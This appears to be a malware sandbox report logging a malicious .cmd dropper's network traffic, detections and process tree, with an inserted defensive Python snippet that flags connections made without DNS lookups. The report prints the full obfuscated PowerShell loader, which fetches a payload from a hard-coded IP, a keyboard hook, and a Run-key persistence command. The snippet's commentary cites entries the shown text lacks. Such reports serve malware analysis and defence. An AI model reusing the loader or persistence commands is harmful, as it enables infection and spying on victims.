              Source: svchost.exe, 00000008.00000003.1828316936.000002087CAE2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
              Source: edb.log.8.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 46.254.34.12:443 -> 192.168.2.4:49747 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.4:49750 version: TLS 1.2
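The "TCP traffic detected without corresponding DNS query" entries above are the signal that separates the hard-coded stage-2 host 87.121.105.163 from the DNS-resolved C2 on duckdns.org. The following added example (not the report's code) reproduces that check over constructed event lists modelled on this section and collapses the repeats into counts, the way the report's 48 identical lines are best read. The DNS answer mapping the duckdns name to 45.88.90.110 and the destination ports are assumptions; the report shows queries and connections but not the answers.

```python
"""Flag connections to addresses that no DNS answer produced.

Added example, not part of the Joe Sandbox report. Event lists are constructed
from the IPs named in the report's Networking section.
"""
from collections import Counter
from ipaddress import ip_address
from typing import Iterable, List, Tuple

# Constructed DNS answers. ASSUMPTION: the duckdns C2 name resolved to
# 45.88.90.110, the only address contacted on the configured Remcos port 3050.
DNS_ANSWERS: List[Tuple[str, str]] = [
    ("jgbours284hawara01.duckdns.org", "45.88.90.110"),
]

# Constructed connection events (dst_ip, dst_port). Ports are assumptions; the
# report shows HTTP GETs with Host: 87.121.105.163, hence 80 for that host.
CONNECTIONS: List[Tuple[str, int]] = (
    [("45.88.90.110", 3050)]
    + [("87.121.105.163", 80)] * 48
    + [("104.46.162.224", 443), ("173.222.162.32", 443)]
    + [("239.255.255.250", 1900)]      # SSDP multicast, expected background noise
)


def is_background_noise(ip: str) -> bool:
    """Multicast, private, link-local and loopback destinations are never DNS-resolved."""
    a = ip_address(ip)
    return a.is_multicast or a.is_private or a.is_link_local or a.is_loopback


def connections_without_dns(
    dns_answers: Iterable[Tuple[str, str]], connections: Iterable[Tuple[str, int]]
) -> List[Tuple[str, int, int]]:
    """Return (ip, port, count) for public destinations that no DNS answer named,
    most frequent first."""
    resolved = {ip for _, ip in dns_answers}
    hits = Counter(
        (ip, port)
        for ip, port in connections
        if ip not in resolved and not is_background_noise(ip)
    )
    return sorted(
        ((ip, port, n) for (ip, port), n in hits.items()),
        key=lambda t: (-t[2], t[0], t[1]),
    )


def report_lines(
    dns_answers: Iterable[Tuple[str, str]], connections: Iterable[Tuple[str, int]]
) -> List[str]:
    """One line per flagged destination, with the repeat count instead of 48 copies."""
    return [
        f"{ip}:{port} contacted without a DNS answer (x{n})"
        for ip, port, n in connections_without_dns(dns_answers, connections)
    ]


if __name__ == "__main__":
    print("\n".join(report_lines(DNS_ANSWERS, CONNECTIONS)))
```

The two single hits at 104.46.162.224 and 173.222.162.32 are also flagged, as they are in the report; they sit alongside the Windows Update requests recorded above and look like OS background traffic, so a production version of this check needs an allow list for such ranges, otherwise the 48-hit hard-coded host is buried in noise.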

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe

              E-Banking Fraud

              Source: Yara matchFile source: 0000000F.00000002.2885259023.0000000005996000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 8872, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED

              System Summary

              Source: amsi64_7504.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: amsi32_7752.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7504, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7752, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5868
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 5892
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_0495404F LdrInitializeThunk,Sleep,NtProtectVirtualMemory,LdrInitializeThunk,15_2_0495404F
              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BA0CED62_2_00007FFD9BA0CED6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BA0DC822_2_00007FFD9BA0DC82
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Stagenes" /t REG_EXPAND_SZ /d "%Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)"
              Source: amsi64_7504.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: amsi32_7752.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7504, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7752, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.spyw.evad.winCMD@43/15@11/10
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Pleurothotonus.DilJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8956:120:WilError_03
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\jnbcourg-8XH6PE
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7456:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7512:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5x5u0sid.ubx.ps1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7504
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7752
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
              Source: Teklif talebi BAKVENTA-BAKUUsurpationens.cmdVirustotal: Detection: 9%
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Teklif talebi BAKVENTA-BAKUUsurpationens.cmd" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Nabolandenes = 1;$Kapsle='S';$Kapsle+='ubstrin';$Kapsle+='g';Function Handig($Fyldepenneblkket){$Bytteforholdet=$Fyldepenneblkket.Length-$Nabolandenes;For($Columbaries=4; $Columbaries -lt $Bytteforholdet; $Columbaries+=(5)){$Festskriftets+=$Fyldepenneblkket.$Kapsle.Invoke( $Columbaries, $Nabolandenes);}$Festskriftets;}function Xerotherm($Drapers){& ($Normalprisen) ($Drapers);}$Palmehavers=Handig 'K njMResaoAfstznedsiFestl urlFokuaUnr /half5Re,u. Unb0bld Tan(PostWFrekiSpeenGarddv,cioInf.wSings Hea BracN RoqTL.at Babo1D,mi0Qq.a.Sten0Prop;Thec DefiWNonciEtagnOpry6Amel4Topc;Gela HetzxIndk6Comp4F.rt;Bill Erhvr Denv N.n:.syc1Basi2sdsu1ge t.Jens0 Spa)Prim UnboGStameSleec,fskkLovloMain/ .om2Nulp0Carb1F rr0Reor0Offi1.ykk0Ahis1Tffe TreF Twoiunwrr DiseSvrdfGattos,rix Ibr/Poli1Far.2Dump1 As .Enhy0Thus ';$Nysseliges=Handig ',undU Eges ignesnotr Ins-AlbuA,lleg,useeUpstnIsoitAnni ';$Fordommes=Handig ' odeh ZigtGacatJ,jup Fl,:.ent/B gg/ lor8Aden7Tors.Do.m1Mult2 Und1dy,n.unbr1cute0 Reg5Appl.Mast1 ic6A mb3Dete/FiltTUnexeKonsrwa.smAut.i rovnSka.aStocl PatjBipaoTigebD sk.OvertMetaoEkspcRhab ';$Problemanalysernes=Handig 'Uro.>Fe.l ';$Normalprisen=Handig 'Mic.iSkaaeRegex Str ';$Schizophasia='Heterozygotes';Xerotherm (Handig 'UndeSRegoePas.tDehu- Je C Stio UnsnGeomtUnteeTalln Re.tSpir Stil-BeatPImpra StetplurhSl.g Ko,mT H.b:Part\Sp,nK.also,mpir AlysNitre W mtSemisMonr.T.att Ch xs,nstDisp ,fsk-FuglV La,aTipslSkaruLa,se Bo lr t$ uscSMisac HydhR.kei looz KigoRep.pLderhAcicaDisrsAppeiAggra,rro;Ge e ');Xerotherm (Handig ' S,pi Chef ,or Labr(AaletFacoe TorsDub tindk- StrpMalaaHeavtTi.eh,ndi H neT Li.:sp l\DemoKAbsooRekorMenisA.foeUnsctUn es.eta.UnibtBentx Adet A.s)Kvin{eksae Pasx,oeci RentEqua} Fer;trop ');$Wedeln = Handig 'NonmedemycBedeh iewoFor edan%kon.al,plpFarmpMakedAra aWoodtBisuaRaft% Gen\Ma,ePRikslTilleSpaau oodrFun.oSenstForbhC.mpoLys,t Tito Ca nUnblu Ma,sAmer.ImprDDistiDi,il Las Gara&Post&Staf C,loeF.tocGennhFangoChi, Tor$Over ';Xerotherm (Handig 'tore$ mangOthilTriloUnstbTr,na.aval ove:paabSOpt.w EngeDir.eLus pAntryT pe=Gaze(S ecc StrmPnhedUdda Fejl/,avlcPr t Utl$,agsWTrine,ilbd DydeFly.lTy.inKar.)Plat ');Xerotherm (Handig 'Pr s$BriegStral ,odoNo,ib ,ndaIntelSu.e:FacoD CleeDo.ab PriaNarktbeeftKonte VaraBramtUds.rCam eIc.nn StoeUtths Reu=Tall$PlamFAn.no F rrStradc.iboDisgmNstemIns,eKlarsCali.Pr bsdetepKr,vlReaciSangt Urf(Gill$TeisP Sk.rE spoPrombB tol DomeCuttmT,lda.allnRhamaJordlopryyPicksWo keArtsrBox.n PrleA,etsAfsp)Slad ');$Fordommes=$Debatteatrenes[0];Xerotherm (Handig ' era$Leucg irklSpeeoF.nabEncaaBal,lCent:B atUStj.rOplaeAmphtGeore f arSouroBagggfor.r ephaLoc.pA sehBars=AlfaN redeKaglwBlyg- accO AntbForlj BoneUgudcAntetDiff LogaSPulvyKonfs A btBilleN,dumMikr.AtomNSysteHetetM.ni.,andWMarke.ussb Si.CS lvlPh.ni P,ceNondnQuintOpsp ');Xerotherm (Handig 'Spin$,jouUBehjrAnt,eTro,tAfstebrikrI.dsoArbegSupprAdgaaReflp Ambh Ec..ToplHGlobeS,beaBedudgrateMor.
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Pleurothotonus.Dil && echo $"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Nabolandenes = 1;$Kapsle='S';$Kapsle+='ubstrin';$Kapsle+='g';Function Handig($Fyldepenneblkket){$Bytteforholdet=$Fyldepenneblkket.Length-$Nabolandenes;For($Columbaries=4; $Columbaries -lt $Bytteforholdet; $Columbaries+=(5)){$Festskriftets+=$Fyldepenneblkket.$Kapsle.Invoke( $Columbaries, $Nabolandenes);}$Festskriftets;}function Xerotherm($Drapers){& ($Normalprisen) ($Drapers);}$Palmehavers=Handig 'K njMResaoAfstznedsiFestl urlFokuaUnr /half5Re,u. Unb0bld Tan(PostWFrekiSpeenGarddv,cioInf.wSings Hea BracN RoqTL.at Babo1D,mi0Qq.a.Sten0Prop;Thec DefiWNonciEtagnOpry6Amel4Topc;Gela HetzxIndk6Comp4F.rt;Bill Erhvr Denv N.n:.syc1Basi2sdsu1ge t.Jens0 Spa)Prim UnboGStameSleec,fskkLovloMain/ .om2Nulp0Carb1F rr0Reor0Offi1.ykk0Ahis1Tffe TreF Twoiunwrr DiseSvrdfGattos,rix Ibr/Poli1Far.2Dump1 As .Enhy0Thus ';$Nysseliges=Handig ',undU Eges ignesnotr Ins-AlbuA,lleg,useeUpstnIsoitAnni ';$Fordommes=Handig ' odeh ZigtGacatJ,jup Fl,:.ent/B gg/ lor8Aden7Tors.Do.m1Mult2 Und1dy,n.unbr1cute0 Reg5Appl.Mast1 ic6A mb3Dete/FiltTUnexeKonsrwa.smAut.i rovnSka.aStocl PatjBipaoTigebD sk.OvertMetaoEkspcRhab ';$Problemanalysernes=Handig 'Uro.>Fe.l ';$Normalprisen=Handig 'Mic.iSkaaeRegex Str ';$Schizophasia='Heterozygotes';Xerotherm (Handig 'UndeSRegoePas.tDehu- Je C Stio UnsnGeomtUnteeTalln Re.tSpir Stil-BeatPImpra StetplurhSl.g Ko,mT H.b:Part\Sp,nK.also,mpir AlysNitre W mtSemisMonr.T.att Ch xs,nstDisp ,fsk-FuglV La,aTipslSkaruLa,se Bo lr t$ uscSMisac HydhR.kei looz KigoRep.pLderhAcicaDisrsAppeiAggra,rro;Ge e ');Xerotherm (Handig ' S,pi Chef ,or Labr(AaletFacoe TorsDub tindk- StrpMalaaHeavtTi.eh,ndi H neT Li.:sp l\DemoKAbsooRekorMenisA.foeUnsctUn es.eta.UnibtBentx Adet A.s)Kvin{eksae Pasx,oeci RentEqua} Fer;trop ');$Wedeln = Handig 'NonmedemycBedeh iewoFor edan%kon.al,plpFarmpMakedAra aWoodtBisuaRaft% Gen\Ma,ePRikslTilleSpaau oodrFun.oSenstForbhC.mpoLys,t Tito Ca nUnblu Ma,sAmer.ImprDDistiDi,il Las Gara&Post&Staf C,loeF.tocGennhFangoChi, Tor$Over ';Xerotherm (Handig 'tore$ mangOthilTriloUnstbTr,na.aval ove:paabSOpt.w EngeDir.eLus pAntryT pe=Gaze(S ecc StrmPnhedUdda Fejl/,avlcPr t Utl$,agsWTrine,ilbd DydeFly.lTy.inKar.)Plat ');Xerotherm (Handig 'Pr s$BriegStral ,odoNo,ib ,ndaIntelSu.e:FacoD CleeDo.ab PriaNarktbeeftKonte VaraBramtUds.rCam eIc.nn StoeUtths Reu=Tall$PlamFAn.no F rrStradc.iboDisgmNstemIns,eKlarsCali.Pr bsdetepKr,vlReaciSangt Urf(Gill$TeisP Sk.rE spoPrombB tol DomeCuttmT,lda.allnRhamaJordlopryyPicksWo keArtsrBox.n PrleA,etsAfsp)Slad ');$Fordommes=$Debatteatrenes[0];Xerotherm (Handig ' era$Leucg irklSpeeoF.nabEncaaBal,lCent:B atUStj.rOplaeAmphtGeore f arSouroBagggfor.r ephaLoc.pA sehBars=AlfaN redeKaglwBlyg- accO AntbForlj BoneUgudcAntetDiff LogaSPulvyKonfs A btBilleN,dumMikr.AtomNSysteHetetM.ni.,andWMarke.ussb Si.CS lvlPh.ni P,ceNondnQuintOpsp ');Xerotherm (Handig 'Spin$,jouUBehjrAnt,eTro,tAfstebrikrI.dsoArbegSupprAdgaaReflp Ambh Ec..ToplH
              Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://%3cfnc1%3e(79)/
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Pleurothotonus.Dil && echo $"
              Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1888,i,9343559299430913976,12874712062366799984,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://%3cfnc1%3e(79)/
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2024 --field-trial-handle=1968,i,3232856823138323663,3674453500036115141,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Stagenes" /t REG_EXPAND_SZ /d "%Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)"
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Stagenes" /t REG_EXPAND_SZ /d "%Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
